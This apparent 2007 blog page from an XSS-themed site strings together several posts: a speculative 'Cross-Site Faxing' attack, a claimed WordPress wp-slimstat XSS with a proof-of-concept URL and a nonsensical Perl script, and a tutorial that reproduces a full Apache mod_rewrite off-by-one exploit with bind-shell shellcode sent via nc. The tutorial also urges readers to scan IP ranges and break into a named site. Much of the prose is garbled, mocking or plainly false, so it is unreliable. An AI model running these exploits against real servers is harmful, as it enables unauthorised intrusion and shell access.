Dr Craig Wright has described a new attack vector known as Cross-Site Faxing (XSF) that abuses weaknesses in OCR 2.0 anti-phishing technology to bypass commercial anti-CSF appliances such as the i-XSS BloggerShield and UBsecure’s new XRCF Webfender 2.1.

On Nov 18, Dr Craig Wright (cwright@bdosyd.com.au) writes to pen-test:

“I have thought of an alternate path to loading a virus bases on a network OCR’d fax server. In the scenario, we have to assume that the system is sending the output to a web front end or HTTP enabled email (not that uncommon).”

Dr Wright subsequently illustrates to the reader what he has previously written using the following hypothetical scenario:

• The system has no input filters and prints all characters to the email, web app.
• The OCR engine is highly accurate and does not add spaces etc.
• The email or web app displays exactly what it received

“Now given that scenario, we have a possible XSS (cross-site-scripting) attack. If there are no filters for an outgoing connection (i.e. no firewall/proxy that strips scripts) and the client browser/email application allows access to the Internet, the attacker could create a script in the page that makes a call to an external system to download a file … a script could also embed a simple XOR obfuscation key to modify the downloaded code. On the web server it would be inert. When XOR’d with the key in the script (after being downloaded and installed), this will thus bypass the AV server (if there is one) and install the malware on the users system. […] Regards, Dr Craig Wright (GSE-Compliance)”

It is interesting to see this challenge considered by the security community. Are there currently any products we can purchase to scan incoming faxes? What about physical mail? A malicious attacker could embed scripting into an application form that is then printed and sent through snail mail to a recipient mail desk which scans the mail and forwards as a pdf or tiff image to the unsuspecting victim.

This attack is very deadly as it takes advantage of embed or macro or client side exploits against pdf or tiff clients and users. This is a very dangerous attack vector that must be explored, and all security consultants are encouraged to alert the wider community of the dangers of Cross Site Faxing and Cross-Site Postage exploits.

0day XSS Exploit for Wordpress 2.3 – wp-slimstat 0.92 – [xssworm.com]

There is a serious holes in wordpress 2.3 that can be used with XSS by a blackhat hacker to attack the wordpress administrator and steal cookies from blogmins. This attack is known as 0day because it has just been reported to public and this is first day of public vulnerability, and 0day means ‘published.’

Below is demonstration attack against wordpress install at http://xssworm.blogvis.com – please do not use him for you attack as we do not have a patch for this 0day exploit. XSSWorm admin is being alerted and look for suspicious click (-;

Proof of concept:

http://wordpress-web-blog.com/wp-admin/index.php?page=wp-slimstat/wp-slimstat.php?panel=1&fi=/feed/&ff=1&ft=<xss shellcode>

This attack to be used against wordpress web blog blogmin to steal blogosphere token to hack blogs. Of course we have included exploit code for this bug at the below.

We have looked at coding for wp-slimstat but we cannot see any problem with input validating. Maybe some of the xssworm.com readers can show us where problem is in the php code because we cannot see any porblem here:

–snips:

C:\temp>findstr GET wp-slimstat.php
$myFilterField = intval( $_GET[’ff’] );
$myFilterType = intval( $_GET[’ft’] );
$myFilterString = $_GET[’fi’];
$myFilterInterval = $_GET[’fd’];
$myFilterField = intval( $_GET[’ff’] );
$myFilterType = intval( $_GET[’ft’] );
$myFilterString = $_GET[’fi’];
$myFilterInterval = $_GET[’fd’];
‘.(!empty($myFilterString)?’— <a href=”?page=’.$_GET[’page’].’&panel=’.$_GET[”panel”].’”>’.__(’Reset filters’, ‘wp-slimstat’).’</a>’:”).’
<input type=”hidden” name=”page” value=”‘.$_GET[’page’].’” />
<input type=”hidden” name=”panel” value=”‘.$_GET[”panel”].’” />
<input type=”hidden” name=”fd” value=”‘.$_GET[”fd”].’” /></form>’;

–snips

With programmor using $_GET variable from user into echo into html output maybe php automatic GET validation filtering is not working for security? We are not programmers of php so we cannot see any porblems here as bug are too complex to understand.

Exploit code for perl whitehats included here:

# Wordpress 2.3 0day exploit – http://xssworm.com
#
# A bug exist in wordpress 2.3 that allow hacker to
# steal blog cookie from wordpress blogmin.
#
# To exploit scripting bug the attacker make link
# to URL of slimstat with XSS shellcode and force
# blog admin to hit link by embedding into fish
# email or making blogmin follow interesting links.
# Also hacker can embed into refer or trackback
# to inject scripting into wordpress dashboard or
# make blogmin visit malicious resource when viewing
# he’s blog.
#
#
# Status: not patched published 0day vulnerability
# Vendor: wordpress.org
# Credit: http://xssworm.com
# Discovery: 1st November 2007
# Exploit developer: Fracesco Vaj (vaj@xssworm.com)
#
# Instruction:
# To execute exploit for wordpress you will need perl or linux
#
# Usage:
#
# Execute with perl or linux as:
# perl wordpress-2.3-0day-xss-injection-bug.pl
#
# Hacker will get prompts for target information.
# Please do not use for irresponsible hacking or to make money.
# Disclaimer: XSSWORM.COM is not responsible.
#
#

#use Net::DNS:Simple;
#use Math;
use Socket;

print “Welcome. What is target email address of wordpress blog admin : \n”;
my $target = <STDIN>;
print “ok target is $target\n”;
sleep(3);
print “ok What is address of wordpress blog : \n”;
sleep(5); my $address = <STDIN>;
print “ok target is $target\n”;
sleep(6);
# print “testing”
print “ok using /wp-admin/?page=wp-slimstat/wp-slimstat.php?panel=1&ft=SHELLCODE\n”;
print “\n\n — CUT OUTPUT HERE — \n\n”;
print “HELO xssworm.com\n”;
print “RSET\n”;
PRINT “MAIL FROM: <xssworm@hotmail.com>\n”;
print “RCPT TO: <$target>\n”;
print “DATA\n”; print “Free x pciture and movies at $address\n”;
print “\r\n.\r\nquit\r\n”;
print “\n\n — END OF OUTPUT CUT HERE –\n”;
print “”;
print “Ok now you neeed to cut the exploit above and paste it to:\n”;
print “$address : 25 \n”;
print “Shellcode by vaj@xssworm.com c. 2007\n”;
print “End of attack.\n”;
print “”;
#print “Debug mode on”
#print “XSS initialized”
#payload
sleep(1); return(0);
# snips
#

Please note that this wp-slimstat does not contain any code injection or mysql injection bug vector that is opened to blackkhat attack via transport of xss.

Many thanks for your comments on this vulnerability in wordpress 2.4

Thanks vaj

Today we have a very special post of a hacking tutorial by the blackhat hacker Sunjester

But first you must need to download the following hacking exploit:

http://www.milw0rm.com/exploits/2237
Ok so first we have step 1.

Code:

#!/bin/sh
# Exploit for Apache mod_rewrite off-by-one.
# Vulnerability discovered by Mark Dowd.
# CVE-2006-3747
#
# by jack <jack\x40gulcas\x2Eorg>
# 2006-08-20
#
# Thx to xuso for help me with the shellcode.
#
# I suppose that you've the "RewriteRule kung/(.*) $1" rule if not
# you must recalculate adressess.
#
# Shellcode is based on Taeho Oh bindshell on port 30464 and modified
# for avoiding apache url-escape.. Take a look is quite nice 
#
# Shellcode address in heap memory on apache 1.3.34 (debian sarge) is at
# 0×0834ae77 for any other version/system find it.
#
# Gulcas rulez  

echo -e “mod_rewrite apache off-by-one overflow”
echo    “by jack <jack\x40gulcas\x2eorg>\n\n”

if [ $# -ne 1 ] ; then
  echo “Usage: $0 webserver”
  exit
fi

host=$1

echo -ne “GET /kung/ldap://localhost/`perl -e ‘print “%90″x128′`%89%e6\
%31%c0%31%db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3\
%01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04\
%31%c0%89%46%10%b0%10%89%46%08%b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66\
%b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31\
%c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8\
%23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76\
%08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db\
%cd%80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\
%77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\r\n\
Host: $host\r\n\r\n” | nc $host 80

# milw0rm.com [2006-08-21]

Sunjester says:

that code runs from a unix shell. so, get into your favorite shell. this tutorial is for thoe who have no idea what to do, with that in mind, lets continue.
If you are stuck already and don’t know where to get shell, Sunjester recommends to you a backtrack attack:

if you are stuck already and dont know where to get orm how to use a shell, im using a livecd, backtrack. lets do the first thing and GET the exploit.

Step 2: we have to download it from milw0rm. - http://milworm.com

Figure 1: Wget exploit downloading tutorial:

Step 2: Sunjester says to all elitehacker student:

now we have to edit the file since it downloaded with some html. if you try to run the file now it will error, it will say soemthing like “Permission Denied”

Example:

Sunjestre say we need to change the files permissions, because:

this aint windows this is a secure filesystem.

ok?

so lets chmod that badboy, might as well give it 777 since im root and its just a livecd. the 777 permission gives read/write/execute to the user, the group, and the owner of the file.

as i said, since im root, and its a friggin livecd, this will be fine.

you should never run scripts under root on your own box.

step 3:

now we can run the script, but we have to remove some stuff that wget put in there when we downloaded it, just some HTML. Open up vi and start replacing the html. you should only have to delete the top line and replace  the &quot with double quotes.

Sunjester: once your done you can save and quit vi or whatever editor you used and run it. should come out something liek below.

now that the script is working, lets look at some ways to find our target servers. we can use nmap and google. those are the two biggest ones i can think of and that i use myself.

you could target really any website

since we will scan a while range or IP addresses. so type something like ::

Sunjester says to start there (festival.com) and scan away.
remember to save logs so its easier to look through, you can just grep through your logs of the scans. below is an example of an nmap scan to gather information about whats on port 80. hopefully we can find some vulnerable ones in that range, if not, pick another hobby.

once you find one, we just run the exploit, lets check and see fi the exploit worked…

*** Note to readers: Unfortunately Sunjester has not included all of screenshots of hacking into FESTIVAL.COM  ***

And now we move on to the final part of hacking:

Step 5:

Sunjester says : ” sweet, netcat your way in this should be the end of the road. if yuo are still having probelsm running this small script, seek help. you need help.  “

–

With special thanks to http://elitehackers.info/?pwnd=true

The hacker PsychoGun have discovered many security vulnerability in the popular video site Metacafe, including new serious XSS exploits.

Vulnerabilities are security holes used by hackers to hack websites or their users. When we make a research with the keyword hacking on metacafe then we can see many hacking videos.

“I do not understand why videos which speak about hacking metacafe vulnerabilities can be rejected where are many videos of hacking Windows, are rewarded” say the Hacker PsychoGun “Does Somebody Have An Answer?”

Visotors Please comment if you have knowledge of hacking metacafe videos or if you have seen these trick before

If you are new to XSS Hacking you must view our special How To Hack blogs and leave comments,

thnx you

Video : Exploit Tutorial : Cross Site Scripting (XSS) and How to Write Exploits - http://xssworm.com

Threat Level: 1-2 out of 5

Description: A vulnerable website page does not filter the input correctly which can open security hole for blackhat hackers in Cross Site Scripting (CSS) Attacks. This video demonstrates how to attack any vulnerable servers using a XSS Scripting attack.

Watch video of hacking tutorials and demonstrations of XSS attacks - visit our XSS Hacking Video site

We are proud to announce the grand-opening of XSS Worm : Cross Site Scripting Attacks ™ - http://www.XSSworm.com - Cross Site Scripting Attacks : the new site for discussion of XSS (also known as CSS (not to be confused with Cascading Style Sheets (also sometimes referred to as CSS)) vulnerabilities) security issues in web-enabled networks and dynamic Internet applications.

XSS - a word commonly used by modern security experts to categorize a wide range of emerging web-enabled security threats. This unpronounceable word was once said to derive from the common term “Cross Site Scripting” (the leading X in this instance perhaps alluding to the Cross of the popular novel.) Yes friends our Web sites are being more complicated from day to day; and the web sites which has been produced by html is decreasing on the net. The popular ones are php;asp;jsp and other technologies and with this increasing the attacks are being more dangerous.

It’s very common and unfortunately still an issue we have to deal with in many web-aware applications. Internally the XSS WORM Team has been working on several XSS Security projects to help mitigate and fix these security issues, as well as to detect them in the code sources that are available online so that they can be fixed a worm is developed.

Go straight to the XSS Security discussion forum!

According to a new study, up to over 90% of all (100%) web sites may be vulnerable to some form of security attack.

Prominent Jeremiah Grossman of WhiteHat Security (whitehat.com) — the Web applications security founded by vulnerability scanning whiz Jeremiah Grossman — concludes that as many as 90 percent of all the sites that it has tested in the last year remain open to some form of hijack or infection.

The leading problem remains many sites’ vulnerability to cross-site scripting (XSS) hacks, through which attackers place malicious code on legitimate sites to trick end users into handing over their personal information or passwords.

As many as 75 percent of the pages scanned by WhiteHat had some form of XSS-exploitable flaw, according to the paper. But it’s not only XSS Worms that application developers have to be conerned about - according to Whitehat, Cross Request Forgery attacks are emerging as the “new .. [xss] ” and hackers are scrambling to update their virus engines.

“The best way to think about Response Splitting is that it’s executed similarly to Cross-Site Scripting (XSS) … but more powerful.“
Jeremiah Grossman

As in the rest of the online world, however, WhiteHat contends that XSS threats top the list of vulnerability classes by vertical, followed closely by Information Leakage.

“These statistics continue to reveal recurring and emerging issues that are affecting Web sites across industries,” said Grossman, who wears the title of CTO at WhiteHat. “As increasing amounts of sensitive data are stored online, WhiteHat remains vigilant about alerting companies to common attack methods and emphasizing the importance of Web site vulnerability management as part of their overall security posture.”

The original security article source can be located at http://weblog.infoworld.com/zeroday/archives/2007/10/study_90_percen.html or at http://google.com.

This is our introduction for the newest premium security information service XSSworm.com : cross-site scripting attacks - we will be posting news and updates on these topics and we welcome all of your comments on the topics of Web 2.0 Security, Cross-Site Scripting, XSS Worms, XSRF Worms, Digg and Social Networking worms, Youtube worms, Facebook worms, Web 2.0 Security and XML and so much more!

Looking for XSS Vulnerabilities and Exploits?

WHITEHATS — Please pay our XSS page a visit and leave your comments! - only the most relevant XSS security news and tools and comments only - no spam please your blackhat SEO tricks is not welcome here.

Regards, The XSS Worm . Com Team.

XSS WORM : Cross Site Scripting Attacks : http://www.xssworm.com - cross-site-scripting-security@xssworm.com - AIM: cross site XSS - (c) 2007,2008